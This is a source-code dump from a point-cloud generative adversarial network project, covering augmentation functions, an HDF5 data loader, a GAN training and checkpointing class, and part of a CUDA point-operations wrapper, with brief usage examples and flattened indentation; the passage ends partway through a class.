def rotate_point_cloud_by_angle_batch(batch_data, rotation_angle):
""" Rotate the point cloud along up direction with certain angle.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, rotated batch of point clouds
"""
rotated_data = np.zeros(batch_data.shape, dtype=np.float32)
for k in range(batch_data.shape[0]):
#rotation_angle = np.random.uniform() * 2 * np.pi
cosval = np.cos(rotation_angle)
sinval = np.sin(rotation_angle)
rotation_matrix = np.array([[cosval, 0, sinval],
[0, 1, 0],
[-sinval, 0, cosval]])
shape_pc = batch_data[k, ...]
rotated_data[k, ...] = np.dot(shape_pc.reshape((-1, 3)), rotation_matrix)
return rotated_data
def rotate_point_cloud_and_gt(pc,gt=None,y_rotated=True):
""" Randomly rotate the point clouds to augument the dataset
rotation is per shape based along up direction
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, rotated batch of point clouds
"""
angles = np.random.uniform(size=(3)) * 2 * np.pi
Rx = np.array([[1, 0, 0],
[0, np.cos(angles[0]), -np.sin(angles[0])],
[0, np.sin(angles[0]), np.cos(angles[0])]])
Ry = np.array([[np.cos(angles[1]), 0, np.sin(angles[1])],
[0, 1, 0],
[-np.sin(angles[1]), 0, np.cos(angles[1])]])
Rz = np.array([[np.cos(angles[2]), -np.sin(angles[2]), 0],
[np.sin(angles[2]), np.cos(angles[2]), 0],
[0, 0, 1]])
if y_rotated:
rotation_matrix = Ry
else:
rotation_matrix = np.dot(Rz, np.dot(Ry, Rx))
pc = np.dot(pc, rotation_matrix)
if gt is not None:
gt = np.dot(gt, rotation_matrix)
return pc, gt
return pc
def jitter_perturbation_point_cloud(pc, sigma=0.01, clip=0.02):
""" Randomly jitter points. jittering is per point.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, jittered batch of point clouds
"""
N, C = pc.shape
assert(clip > 0)
jittered_data = np.clip(sigma * np.random.randn(N, C), -1*clip, clip)
jittered_data += pc
return jittered_data
def jitter_perturbation_point_cloud_bt(batch_data, sigma=0.01, clip=0.02):
""" Randomly jitter points. jittering is per point.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, jittered batch of point clouds
"""
jittered_data = np.zeros(batch_data.shape, dtype=np.float32)
_, N, C = batch_data.shape
for k in range(batch_data.shape[0]):
# rotation_angle = np.random.uniform() * 2 * np.pi
noise = np.clip(sigma * np.random.randn(N, C), -1 * clip, clip)
shape_pc = batch_data[k, ...]
jittered_data[k, ...] = shape_pc + noise
return jittered_data
def shift_point_cloud_and_gt(pc, gt = None, shift_range=0.1):
""" Randomly shift point cloud. Shift is per point cloud.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, shifted batch of point clouds
"""
N, C = pc.shape
shifts = np.random.uniform(-shift_range, shift_range, (3))
pc = pc + shifts
if gt is not None:
gt = gt + shifts
return pc, gt
return pc
def translate_pointcloud(pointcloud):
xyz1 = np.random.uniform(low=2. / 3., high=3. / 2., size=[3])
xyz2 = np.random.uniform(low=-0.2, high=0.2, size=[3])
translated_pointcloud = np.add(np.multiply(pointcloud, xyz1), xyz2).astype('float32')
return translated_pointcloud
def random_scale_point_cloud_and_gt(pc, gt = None, scale_low=0.8, scale_high=1.25):
""" Randomly scale the point cloud. Scale is per point cloud.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, scaled batch of point clouds
"""
N, C = pc.shape
scale = np.random.uniform(scale_low, scale_high, 1)
pc = pc * scale
if gt is not None:
gt = gt * scale
return pc, gt, scale
return pc
def rotate_perturbation_point_cloud(pc, angle_sigma=0.06, angle_clip=0.18):
""" Randomly perturb the point clouds by small rotations
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, rotated batch of point clouds
"""
N, C = pc.shape
angles = np.clip(angle_sigma*np.random.randn(3), -angle_clip, angle_clip)
Rx = np.array([[1,0,0],
[0,np.cos(angles[0]),-np.sin(angles[0])],
[0,np.sin(angles[0]),np.cos(angles[0])]])
Ry = np.array([[np.cos(angles[1]),0,np.sin(angles[1])],
[0,1,0],
[-np.sin(angles[1]),0,np.cos(angles[1])]])
Rz = np.array([[np.cos(angles[2]),-np.sin(angles[2]),0],
[np.sin(angles[2]),np.cos(angles[2]),0],
[0,0,1]])
R = np.dot(Rz, np.dot(Ry,Rx))
pc = np.dot(pc, R)
return pc
def guass_noise_point_cloud(batch_data, sigma=0.005, mu=0.00):
""" Add guassian noise in per point.
Input:
BxNx3 array, original batch of point clouds
Return:
BxNx3 array, jittered batch of point clouds
"""
batch_data += np.random.normal(mu, sigma, batch_data.shape)
return batch_data
def rotate_point_cloud_by_angle(data, rotation_angle):
    """
    Rotate the point cloud along the up direction by a given angle.
    (Module-level function; the stray `self` parameter has been removed.)
    :param data: Nx3 array, original point cloud
    :param rotation_angle: rotation angle in radians
    :return: Nx3 array, rotated point cloud
"""
cosval = np.cos(rotation_angle)
sinval = np.sin(rotation_angle)
rotation_matrix = np.array([[cosval, 0, sinval],
[0, 1, 0],
[-sinval, 0, cosval]])
rotated_data = np.dot(data, rotation_matrix)
return rotated_data
```
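A minimal sketch of how these augmentation helpers can be chained on a single point cloud. The shapes follow the docstrings above; the random input and the parameter values are purely illustrative.
```python
import numpy as np
from Common import point_operation as pop

pc = np.random.rand(2048, 3).astype(np.float32)   # stand-in for a real (N, 3) cloud

pc = pop.rotate_point_cloud_and_gt(pc)                                # gt=None -> only pc returned
pc = pop.jitter_perturbation_point_cloud(pc, sigma=0.01, clip=0.02)   # per-point jitter
pc = pop.random_scale_point_cloud_and_gt(pc, scale_low=0.8, scale_high=1.25)

batch = pop.normalize_point_cloud(pc[np.newaxis, ...])                # expects an [N, P, 3] batch
print(batch.shape)                                                    # (1, 2048, 3)
```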
#### File: SP-GAN/Generation/H5DataLoader.py
```python
import numpy as np
import warnings
import h5py
from torch.utils.data import Dataset
from glob import glob
from Common import point_operation
import os
warnings.filterwarnings('ignore')
from torchvision import transforms
from Common import data_utils as d_utils
import torch
def load_h5(h5_filename, num=2048):
    # open read-only and close the file handle after reading
    with h5py.File(h5_filename, 'r') as f:
        data = f['poisson_%d' % num][:]
    return data
point_transform = transforms.Compose(
[
d_utils.PointcloudToTensor(),
d_utils.PointcloudRotate(),
d_utils.PointcloudRotatePerturbation(),
d_utils.PointcloudScale(),
d_utils.PointcloudTranslate(),
d_utils.PointcloudJitter(),
#d_utils.PointcloudRandomInputDropout(),
]
)
point_transform2 = transforms.Compose(
[
d_utils.PointcloudToTensor(),
d_utils.PointcloudScale(),
d_utils.PointcloudTranslate(),
#d_utils.PointcloudRandomInputDropout(),
]
)
class H5DataLoader(Dataset):
def __init__(self, opts,augment=False, partition='train'):
self.opts = opts
self.num_points = opts.np
self.con = opts.con
if self.con:
cats = ["chair","table","bench"][:opts.cls]
pcs = []
labels = []
for i, cat in enumerate(cats):
h5_file = os.path.join(opts.data_root, str(self.num_points), str(cat).lower() + ".h5")
print("---------------h5_file:", h5_file)
pc = load_h5(h5_file, self.num_points)
pc = point_operation.normalize_point_cloud(pc)
label = np.ones((pc.shape[0],))*i
pcs.append(pc)
labels.append(label)
self.data = np.concatenate(pcs,axis=0)
self.labels = np.concatenate(labels, axis=0).astype(np.int32)
print(self.labels.shape)
# elif opts.choice == "animal":
# pcs = []
# for i in range(5):
# h5_file = os.path.join(opts.data_root, str(self.num_points), str(opts.choice).lower(), str(opts.choice).lower() + "_%d.h5"%i)
# print("---------------h5_file:", h5_file)
# pc = load_h5(h5_file, self.num_points)
# pc = point_operation.normalize_point_cloud(pc)
# pcs.append(pc)
#
# self.data = np.concatenate(pcs,axis=0)
elif opts.choice == "animal_all":
pcs = []
cats = ["animal-pose", "animal-deform"]
for cat in cats:
h5_file = os.path.join(opts.data_root, str(self.num_points), str(cat).lower() + ".h5")
print("---------------h5_file:", h5_file)
pc = load_h5(h5_file, self.num_points)
pc = point_operation.normalize_point_cloud(pc)
pcs.append(pc)
self.data = np.concatenate(pcs, axis=0)
elif opts.choice == "bottle":
pcs = []
cats = ["bottle","jar","pot"]
for cat in cats:
h5_file = os.path.join(opts.data_root, str(self.num_points), str(cat).lower() + ".h5")
print("---------------h5_file:", h5_file)
pc = load_h5(h5_file, self.num_points)
pc = point_operation.normalize_point_cloud(pc)
pcs.append(pc)
self.data = np.concatenate(pcs,axis=0)
else:
h5_file = os.path.join(opts.data_root, str(self.num_points), str(opts.choice).lower()+".h5")
print("---------------h5_file:",h5_file)
self.data = load_h5(h5_file,self.num_points)
self.labels = None
self.data = self.opts.scale * point_operation.normalize_point_cloud(self.data)
self.augment = augment
self.partition = partition
def __len__(self):
return len(self.data)
def __getitem__(self, index):
point_set = self.data[index][:self.num_points,:3].copy()
np.random.shuffle(point_set)
if self.augment:
point_set = point_operation.rotate_point_cloud_and_gt(point_set)
point_set = point_operation.random_scale_point_cloud_and_gt(point_set)
point_set = point_set.astype(np.float32)
if self.con:
label = self.labels[index].copy()
return torch.Tensor(point_set), torch.Tensor(label)
return torch.from_numpy(point_set)
```
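A hedged sketch of driving H5DataLoader. The option names mirror the attributes read inside the class; the concrete values, the `data_root` layout and the `"chair"` choice are assumptions for illustration only.
```python
from argparse import Namespace
from torch.utils.data import DataLoader
from Generation.H5DataLoader import H5DataLoader

# data_root/<np>/<choice>.h5 must exist and contain a 'poisson_<np>' dataset
opts = Namespace(np=2048, con=False, cls=1, choice="chair",
                 data_root="data", scale=1.0)

dataset = H5DataLoader(opts, augment=True)
loader = DataLoader(dataset, batch_size=16, shuffle=True,
                    num_workers=4, drop_last=True)

for batch in loader:
    print(batch.shape)   # (16, 2048, 3)
    break
```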
#### File: SP-GAN/Generation/model.py
```python
import numpy as np
import math
import sys
import os
import time
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torch.optim as optim
from torch.autograd import Variable
import torch.nn.functional as F
import logging
import random
import imageio
# add for shape-preserving Loss
from Common.point_operation import normalize_point_cloud
from Generation.H5DataLoader import H5DataLoader
from collections import namedtuple
# from pointnet2.pointnet2_modules import PointNet2SAModule, PointNet2SAModuleMSG
from Common.loss_utils import ChamferLoss,pairwise_CD
from Common import point_operation
from Common import data_utils as d_util
from Common.loss_utils import get_local_pair,compute_all_metrics2,AverageValueMeter,dist_simple
from Common import loss_utils
from tensorboardX import SummaryWriter
from Common.visu_utils import plot_pcd_three_views,point_cloud_three_views,plot_pcd_multi_rows
from tqdm import tqdm
#from Generation.Generator import Generator
from Generation.Generator_advanced_model import Generator
from Generation.Discriminator import Discriminator
from Common.network_utils import *
import copy
from pprint import pprint
cudnn.benchmark = True
seed = 123
random.seed(seed)
#np.random.seed(seed)
torch.manual_seed(seed)
#torch.cuda.manual_seed(seed)
#torch.cuda.manual_seed_all(seed)
def pc_normalize(pc):
l = pc.shape[0]
centroid = np.mean(pc, axis=0)
pc = pc - centroid
m = np.max(np.sqrt(np.sum(pc**2, axis=1)))
pc = pc / m
return pc
class Model(object):
def __init__(self, opts):
self.opts = opts
def backup(self):
if self.opts.phase == 'train':
source_folder = os.path.join(os.getcwd(),"Generation")
common_folder = os.path.join(os.getcwd(),"Common")
data_folder = os.path.join(os.getcwd(), "data_utils")
os.system("cp %s/Generator.py '%s/Generator.py'" % (source_folder,self.opts.log_dir))
os.system("cp %s/Discriminator.py '%s/Discriminator.py'" % (source_folder,self.opts.log_dir))
os.system("cp %s/model.py '%s/model.py'" % (source_folder,self.opts.log_dir))
os.system("cp %s/loss_utils.py '%s/loss_utils.py'" % (common_folder,self.opts.log_dir))
os.system("cp %s/H5DataLoader.py '%s/H5DataLoader.py'" % (data_folder,self.opts.log_dir))
def build_model(self):
""" Models """
self.G = Generator(self.opts)
self.D = Discriminator(self.opts)
self.multi_gpu = False
if torch.cuda.device_count() > 1:
print("Let's use", torch.cuda.device_count(), "GPUs!")
# dim = 0 [30, xxx] -> [10, ...], [10, ...], [10, ...] on 3 GPUs
self.G = nn.DataParallel(self.G)
self.D = nn.DataParallel(self.D)
self.multi_gpu = True
print('# generator parameters:', sum(param.numel() for param in self.G.parameters()))
print('# discriminator parameters:', sum(param.numel() for param in self.D.parameters()))
self.G.cuda()
self.D.cuda()
""" Training """
beta1 = 0.5
beta2 = 0.99
self.optimizerG = optim.Adam(filter(lambda p: p.requires_grad, self.G.parameters()), lr=self.opts.lr_g, betas=(beta1, beta2))
self.optimizerD = optim.Adam(filter(lambda p: p.requires_grad, self.D.parameters()), lr=self.opts.lr_d, betas=(beta1, beta2))
if self.opts.lr_decay:
if self.opts.use_sgd:
self.scheduler_G = torch.optim.lr_scheduler.CosineAnnealingLR(self.optimizerG, self.opts.max_epoch, eta_min=self.opts.lr_g)
else:
self.scheduler_G = torch.optim.lr_scheduler.StepLR(self.optimizerG, step_size=self.opts.lr_decay_feq, gamma=self.opts.lr_decay_rate)
else:
self.scheduler_G = None
if self.opts.lr_decay:
self.scheduler_D = torch.optim.lr_scheduler.StepLR(self.optimizerD, step_size=self.opts.lr_decay_feq, gamma=self.opts.lr_decay_rate)
else:
self.scheduler_D = None
# define tensors
self.z = torch.FloatTensor(self.opts.bs, self.opts.nz).cuda()
self.z = Variable(self.z)
self.ball = None
label = torch.full((self.opts.bs,), 1).cuda()
ones = torch.full((self.opts.bs,), 1).cuda()
self.fix_z = None
def noise_generator(self, bs=1,masks=None):
if masks is None:
if self.opts.n_rand:
noise = np.random.normal(0, self.opts.nv, (bs, self.opts.np, self.opts.nz))
else:
noise = np.random.normal(0, self.opts.nv, (bs, 1, self.opts.nz))
#scale = self.opts.nv
#w = np.random.uniform(low=-scale, high=scale, size=(bs, 1, self.opts.nz))
noise = np.tile(noise,(1,self.opts.np,1))
if self.opts.n_mix and random.random() < 0.5:
noise2 = np.random.normal(0, self.opts.nv, (bs, self.opts.nz))
for i in range(bs):
id = np.random.randint(0,self.opts.np)
idx = np.argsort(self.ball_dist[id])[::1]
# idx = np.arange(self.opts.np)
# np.random.shuffle(idx)
num = int(max(random.random(),0.1)*self.opts.np)
noise[i, idx[:num]] = noise2[i]
else:
noise = np.zeros((bs, self.opts.np, self.opts.nz))
for i in range(masks.shape[0]):
mask = masks[i]
unique_mask = np.unique(mask)
for j in unique_mask:
noise_once = np.random.normal(0, 0.2, (1, self.opts.nz))
idx = np.where(mask == j)
                    noise[i, idx] = noise_once  # assign the per-segment noise vector
sim_noise = Variable(torch.Tensor(noise)).cuda()
return sim_noise
def sphere_generator(self,bs=2,static=True):
if self.ball is None:
self.ball = np.loadtxt('template/balls/%d.xyz'%self.opts.np)[:,:3]
self.ball = pc_normalize(self.ball)
N = self.ball.shape[0]
            # pairwise squared distances between template points:
            # ||xi - xj||^2 = ||xi||^2 + ||xj||^2 - 2 * xi . xj
            xx = np.sum(self.ball ** 2, axis=1).reshape(N, 1)
            yy = xx.T
            xy = -2 * self.ball @ self.ball.T
            self.ball_dist = xy + xx + yy  # [N, N]
if static:
ball = np.expand_dims(self.ball, axis=0)
ball = np.tile(ball, (bs, 1, 1))
else:
ball = np.zeros((bs, self.opts.np, 3))
for i in range(bs):
idx = np.random.choice(self.ball.shape[0], self.opts.np)
ball[i] = self.ball[idx]
ball = Variable(torch.Tensor(ball)).cuda()
return ball
def train(self):
global epoch
self.build_model()
self.backup()
start_epoch = 1
        # restore checkpoint if it exists
if self.opts.restore:
could_load, save_epoch = self.load(self.opts.log_dir)
if could_load:
start_epoch = save_epoch
print(" [*] Load SUCCESS")
self.LOG_FOUT = open(os.path.join(self.opts.log_dir, 'log_train.txt'), 'a')
else:
print('training...')
self.LOG_FOUT = open(os.path.join(self.opts.log_dir, 'log_train.txt'), 'w')
self.LOG_FOUT.write(str(self.opts) + '\n')
self.log_string('PARAMETER ...')
with open(os.path.join(self.opts.log_dir, 'args.txt'), 'w') as log:
for arg in sorted(vars(self.opts)):
log.write(arg + ': ' + str(getattr(self.opts, arg)) + '\n') # log of arguments
pprint(self.opts)
self.writer = None#SummaryWriter(logdir=self.opts.log_dir)
'''DATA LOADING'''
self.log_string('Load dataset ...')
self.train_dataset = H5DataLoader(self.opts, augment=self.opts.augment)
self.dataloader = torch.utils.data.DataLoader(self.train_dataset, batch_size=self.opts.bs,
shuffle=True, num_workers=int(self.opts.workers),drop_last=True,pin_memory=True)
self.num_batches = len(self.train_dataset) // self.opts.bs
self.z_test = torch.FloatTensor(self.opts.bs, self.opts.nz).cuda()
self.z_test.data.resize_(self.opts.bs, self.opts.nz).normal_(0.0, 1.0)
# loop for epoch
start_time = time.time()
d_avg_meter = AverageValueMeter()
g_avg_meter = AverageValueMeter()
real_acc_avg_meter = AverageValueMeter()
fake_acc_avg_meter = AverageValueMeter()
global_step = 0
d_para = 1.0
g_para = 1.0
x = self.sphere_generator(bs=self.opts.bs)
self.fix_z = self.noise_generator(bs=64)
for epoch in range(start_epoch, self.opts.max_epoch+1):
self.D.train()
self.G.train()
step_d = 0
step_g = 0
for idx, data in tqdm(enumerate(self.dataloader, 0),total=len(self.dataloader)):
requires_grad(self.G, False)
requires_grad(self.D, True)
self.optimizerD.zero_grad()
real_points = Variable(data,requires_grad=True)
z = self.noise_generator(bs=self.opts.bs)
d_fake_preds =self.G(x, z)
real_points = real_points.transpose(2, 1).cuda()
d_fake_preds = d_fake_preds.detach()
d_real_logit = self.D(real_points)
d_fake_logit = self.D(d_fake_preds)
lossD,info= loss_utils.dis_loss(d_real_logit,d_fake_logit,gan=self.opts.gan,noise_label=self.opts.flip_d)
lossD.backward()
self.optimizerD.step()
# -----------------------------------train G-----------------------------------
requires_grad(self.G, True)
requires_grad(self.D, False)
self.optimizerG.zero_grad()
z = self.noise_generator(bs=self.opts.bs)
g_fake_preds =self.G(x, z)
g_real_logit = self.D(real_points)
g_fake_logit = self.D(g_fake_preds)
lossG,_ = loss_utils.gen_loss(g_real_logit,g_fake_logit,gan=self.opts.gan,noise_label=self.opts.flip_g)
lossG.backward()
self.optimizerG.step()
d_avg_meter.update(lossD.item())
g_avg_meter.update(lossG.item())
real_acc_avg_meter.update(info['real_acc'])
fake_acc_avg_meter.update(info['fake_acc'])
if self.writer is not None:
self.writer.add_scalar("loss/d_Loss", lossD.data, global_step)
self.writer.add_scalar("loss/g_Loss", lossG.data, global_step)
self.writer.add_scalar("acc/real_acc", info['real_acc'], global_step)
self.writer.add_scalar("acc/fake_acc", info['fake_acc'], global_step)
self.writer.add_histogram('d_real_logit', d_real_logit, global_step)
self.writer.add_histogram('d_fake_logit', d_fake_logit, global_step)
self.writer.add_histogram('g_fake_logit', g_fake_logit, global_step)
#optimizer.param_groups[0]['lr']
#scheduler_G.get_lr()[0]
self.writer.add_scalar("lr/lr_g", self.optimizerG.param_groups[0]['lr'], global_step)
self.writer.add_scalar("lr/lr_d", self.optimizerD.param_groups[0]['lr'], global_step)
global_step +=1
if self.opts.save and global_step%20==0:
requires_grad(self.G, False)
self.draw_sample_save(epoch=epoch,step=global_step)
requires_grad(self.G, True)
if self.scheduler_G is not None:
self.scheduler_G.step(epoch)
if self.scheduler_D is not None:
self.scheduler_D.step(epoch)
time_tick = time.time() - start_time
self.log_string("Epoch: [%2d] time: %2dm %2ds d_loss4: %.8f, g_loss: %.8f" \
% (epoch, time_tick / 60, time_tick % 60, d_avg_meter.avg, g_avg_meter.avg))
self.log_string("real_acc: %f fake_acc: %f" % (real_acc_avg_meter.avg, fake_acc_avg_meter.avg))
self.log_string("lr_g: %f lr_d: %f" % (self.optimizerG.param_groups[0]['lr'], self.optimizerD.param_groups[0]['lr']))
print("step_d:%d step_g:%d"%(step_d,step_g))
# if self.scheduler_G is not None and self.scheduler_D is not None:
# print("lr_g: %f lr_d: %f"%(self.scheduler_G.get_lr()[0],self.scheduler_D.get_lr()[0]))
requires_grad(self.G, False)
requires_grad(self.D, True)
if epoch % self.opts.snapshot == 0:
self.save(self.opts.log_dir, epoch)
if False and not self.opts.save:
self.draw_sample(epoch)
self.save(self.opts.log_dir, epoch)
self.LOG_FOUT.close()
def draw_sample(self, epoch):
eval_dir = os.path.join(self.opts.log_dir, "plot")
if not os.path.exists(eval_dir):
os.makedirs(eval_dir)
grid_x = 8
grid_y = 8
x = self.sphere_generator(bs=grid_y)
pcds_list = []
title_list = []
for i in range(grid_x):
title = ["S_%d" % (i * grid_y + j) for j in range(grid_y)]
with torch.no_grad():
#z = self.noise_generator(bs=grid_y)
z = self.fix_z[i*grid_y:(i+1)*grid_y]
out_pc = self.G(x, z)
out_pc = out_pc.transpose(2, 1)
sample_pcs = out_pc.cpu().detach().numpy()
sample_pcs = normalize_point_cloud(sample_pcs)
pcds_list.append(0.75 * sample_pcs)
title_list.append(title)
plot_name = os.path.join(eval_dir, str(epoch) + ".png")
plot_pcd_multi_rows(plot_name, pcds_list, title_list, cmap="Reds")
def draw_sample_save(self, epoch, step):
eval_dir = os.path.join(self.opts.log_dir, "plot")
if not os.path.exists(eval_dir):
os.makedirs(eval_dir)
grid_x = 8
grid_y = 8
x = self.sphere_generator(bs=grid_y)
pcds_list = []
title_list = []
for i in range(grid_x):
title = ["S_%d" % (i * grid_y + j) for j in range(grid_y)]
with torch.no_grad():
#z = self.noise_generator(bs=grid_y)
z = self.fix_z[i*grid_y:(i+1)*grid_y]
out_pc = self.G(x, z)
out_pc = out_pc.transpose(2, 1)
sample_pcs = out_pc.cpu().detach().numpy()
sample_pcs = normalize_point_cloud(sample_pcs)
pcds_list.append(0.75 * sample_pcs)
title_list.append(title)
plot_name = os.path.join(eval_dir, str(step) + ".png")
plot_pcd_multi_rows(plot_name, pcds_list, title_list, cmap="Reds")
for i in range(grid_x):
pcs = normalize_point_cloud(pcds_list[i])
for j in range(grid_y):
id = i*grid_y+j
save_folder = os.path.join(eval_dir,"sample",str(id))
if not os.path.exists(save_folder):
os.makedirs(save_folder)
save_name = os.path.join(save_folder,"%d_step_%d.xyz"%(id,step))
np.savetxt(save_name,pcs[j],fmt="%.6f")
def test_once(self,epoch):
#self.G.eval()
eval_dir = os.path.join(self.opts.log_dir,"plot")
if not os.path.exists(eval_dir):
os.makedirs(eval_dir)
bs = 4
# x = np.loadtxt('template/ball.xyz')
# x = pc_normalize(x)
# x = np.expand_dims(x, axis=0)
# x = np.tile(x, (bs, 1, 1))
# x = Variable(torch.Tensor(x)).cuda()
x = self.sphere_generator(bs=bs)
#if self.fix_z is None:
self.fix_z = self.noise_generator(bs=bs)
gen_points4 = self.G(x,self.fix_z)
# print(gen_points.shape)
gen_points4 = gen_points4.transpose(2, 1).cpu().data.numpy() # Bx3x2048 -> Bx2048x3
gen_points4 = point_operation.normalize_point_cloud(gen_points4)
pcds = [gen_points4[0], gen_points4[1], gen_points4[2], gen_points4[3]]
# print(type(pcds), len(pcds))
# np.asarray(pcds).reshape([3,self.opts.num_point,3])
plot_path = os.path.join(eval_dir, str(epoch) + ".png")
visualize_titles = ['S1', 'S2', 'S3', 'S4']
plot_pcd_three_views(plot_path, pcds, visualize_titles)
def log_string(self, out_str):
self.LOG_FOUT.write(out_str+'\n')
self.LOG_FOUT.flush()
print(out_str)
def set_logger(self):
self.logger = logging.getLogger("CLS")
self.logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
file_handler = logging.FileHandler(os.path.join(self.opts.log_dir, "log_%s.txt" % self.opts.phase))
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(formatter)
self.logger.addHandler(file_handler)
def load(self, checkpoint_dir):
if self.opts.pretrain_model_G is None and self.opts.pretrain_model_D is None:
print('################ new training ################')
return False, 1
print(" [*] Reading checkpoints...")
#checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir, self.model_name)
# ----------------- load G -------------------
        if self.opts.pretrain_model_G is not None:
            resume_file_G = os.path.join(checkpoint_dir, self.opts.pretrain_model_G)
            # no trailing comma here: it would turn flag_G into a tuple and the
            # missing-checkpoint check below could never trigger
            flag_G = os.path.isfile(resume_file_G)
            if not flag_G:
print('G--> Error: no checkpoint directory found!')
exit()
else:
print('resume_file_G------>: {}'.format(resume_file_G))
checkpoint = torch.load(resume_file_G)
self.G.load_state_dict(checkpoint['G_model'])
self.optimizerG.load_state_dict(checkpoint['G_optimizer'])
G_epoch = checkpoint['G_epoch']
else:
print(" [*] Failed to find the pretrain_model_G")
exit()
# ----------------- load D -------------------
        if self.opts.pretrain_model_D is not None:
            resume_file_D = os.path.join(checkpoint_dir, self.opts.pretrain_model_D)
            flag_D = os.path.isfile(resume_file_D)
            if not flag_D:
print('D--> Error: no checkpoint directory found!')
exit()
else:
print('resume_file_D------>: {}'.format(resume_file_D))
checkpoint = torch.load(resume_file_D)
self.D.load_state_dict(checkpoint['D_model'])
D_epoch = checkpoint['D_epoch']
else:
print(" [*] Failed to find the pretrain_model_D")
exit()
print(" [*] Success to load model --> {} & {}".format(self.opts.pretrain_model_G, self.opts.pretrain_model_D))
return True, G_epoch
def save(self, checkpoint_dir, index_epoch):
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
save_name = str(index_epoch)+'_'+self.opts.choice
path_save_G = os.path.join(checkpoint_dir, save_name+'_G.pth')
path_save_D = os.path.join(checkpoint_dir, save_name+'_D.pth')
print('Save Path for G: {}'.format(path_save_G))
print('Save Path for D: {}'.format(path_save_D))
torch.save({
'G_model':self.G.module.state_dict() if self.multi_gpu else self.G.state_dict(),
'G_optimizer': self.optimizerG.state_dict() ,
'G_epoch': index_epoch,
}, path_save_G)
torch.save({
# 'D_model1': self.discriminator1.state_dict(),
# 'D_model2': self.discriminator2.state_dict(),
# 'D_model3': self.discriminator3.state_dict(),
'D_model': self.D.module.state_dict() if self.multi_gpu else self.D.state_dict(),
'D_optimizer': self.optimizerD.state_dict(),
# 'D_optimizer2': self.optimizerD2.state_dict(),
# 'D_optimizer3': self.optimizerD3.state_dict(),
# 'D_optimizer4': self.optimizerD.state_dict(),
'D_epoch': index_epoch,
}, path_save_D)
# torch.save(G, os.path.join(opt.outd, opt.outm, f'G_nch-{opt.nch}_epoch-{epoch}.pth'))
# torch.save(D, os.path.join(opt.outd, opt.outm, f'D_nch-{opt.nch}_epoch-{epoch}.pth'))
# torch.save(Gs, os.path.join(opt.outd, opt.outm, f'Gs_nch-{opt.nch}_epoch-{epoch}.pth'))
```
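A hedged sketch of how the Model class above could be driven end-to-end. The option names are taken from the attributes the class reads; every value, as well as the expectation that an existing log_dir, the template/balls/&lt;np&gt;.xyz file, the H5 data and a CUDA device are available, is an assumption — real runs would build opts from the project's own argument parser.
```python
from argparse import Namespace
from Generation.model import Model

opts = Namespace(
    phase="train", log_dir="log/spgan_chair", restore=False,
    pretrain_model_G=None, pretrain_model_D=None,
    bs=16, nz=128, np=2048, nv=0.2, n_rand=True, n_mix=False,
    lr_g=1e-4, lr_d=1e-4, lr_decay=True, lr_decay_feq=40, lr_decay_rate=0.5,
    use_sgd=False, max_epoch=300, snapshot=20, save=False,
    gan="ls", flip_d=False, flip_g=False,
    choice="chair", data_root="data", scale=1.0, augment=False,
    con=False, cls=1, workers=4,
)

model = Model(opts)
model.train()   # builds G/D, loads the H5 data and runs the adversarial loop
```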
#### File: metrics/pointops/pointops_util.py
```python
from typing import Tuple
import torch
from torch.autograd import Function
import torch.nn as nn
from metrics.pointops import pointops_cuda
import numpy as np
class FurthestSampling(Function):
@staticmethod
def forward(ctx, xyz, m):
"""
input: xyz: (b, n, 3) and n > m, m: int32
output: idx: (b, m)
"""
assert xyz.is_contiguous()
b, n, _ = xyz.size()
idx = torch.cuda.IntTensor(b, m)
temp = torch.cuda.FloatTensor(b, n).fill_(1e10)
pointops_cuda.furthestsampling_cuda(b, n, m, xyz, temp, idx)
return idx
@staticmethod
def backward(xyz, a=None):
return None, None
furthestsampling = FurthestSampling.apply
class Gathering(Function):
@staticmethod
def forward(ctx, features, idx):
"""
input: features: (b, c, n), idx : (b, m) tensor
output: (b, c, m)
"""
assert features.is_contiguous()
assert idx.is_contiguous()
b, c, n = features.size()
m = idx.size(1)
output = torch.cuda.FloatTensor(b, c, m)
pointops_cuda.gathering_forward_cuda(b, c, n, m, features, idx, output)
ctx.for_backwards = (idx, c, n)
return output
@staticmethod
def backward(ctx, grad_out):
idx, c, n = ctx.for_backwards
b, m = idx.size()
grad_features = torch.cuda.FloatTensor(b, c, n).zero_()
grad_out_data = grad_out.data.contiguous()
pointops_cuda.gathering_backward_cuda(b, c, n, m, grad_out_data, idx, grad_features.data)
return grad_features, None
gathering = Gathering.apply
class NearestNeighbor(Function):
@staticmethod
def forward(ctx, unknown: torch.Tensor, known: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Find the three nearest neighbors of unknown in known
input: unknown: (b, n, 3), known: (b, m, 3)
output: dist2: (b, n, 3) l2 distance to the three nearest neighbors
idx: (b, n, 3) index of 3 nearest neighbors
"""
assert unknown.is_contiguous()
assert known.is_contiguous()
b, n, _ = unknown.size()
m = known.size(1)
dist2 = torch.cuda.FloatTensor(b, n, 3)
idx = torch.cuda.IntTensor(b, n, 3)
pointops_cuda.nearestneighbor_cuda(b, n, m, unknown, known, dist2, idx)
return torch.sqrt(dist2), idx
@staticmethod
def backward(ctx, a=None, b=None):
return None, None
nearestneighbor = NearestNeighbor.apply
class Interpolation(Function):
@staticmethod
def forward(ctx, features: torch.Tensor, idx: torch.Tensor, weight: torch.Tensor) -> torch.Tensor:
"""
        Performs weighted linear interpolation over the 3 nearest-neighbor features
input: features: (b, c, m) features descriptors to be interpolated from
idx: (b, n, 3) three nearest neighbors of the target features in features
weight: (b, n, 3) weights
output: (b, c, n) tensor of the interpolated features
"""
assert features.is_contiguous()
assert idx.is_contiguous()
assert weight.is_contiguous()
b, c, m = features.size()
n = idx.size(1)
ctx.interpolation_for_backward = (idx, weight, m)
output = torch.cuda.FloatTensor(b, c, n)
pointops_cuda.interpolation_forward_cuda(b, c, m, n, features, idx, weight, output)
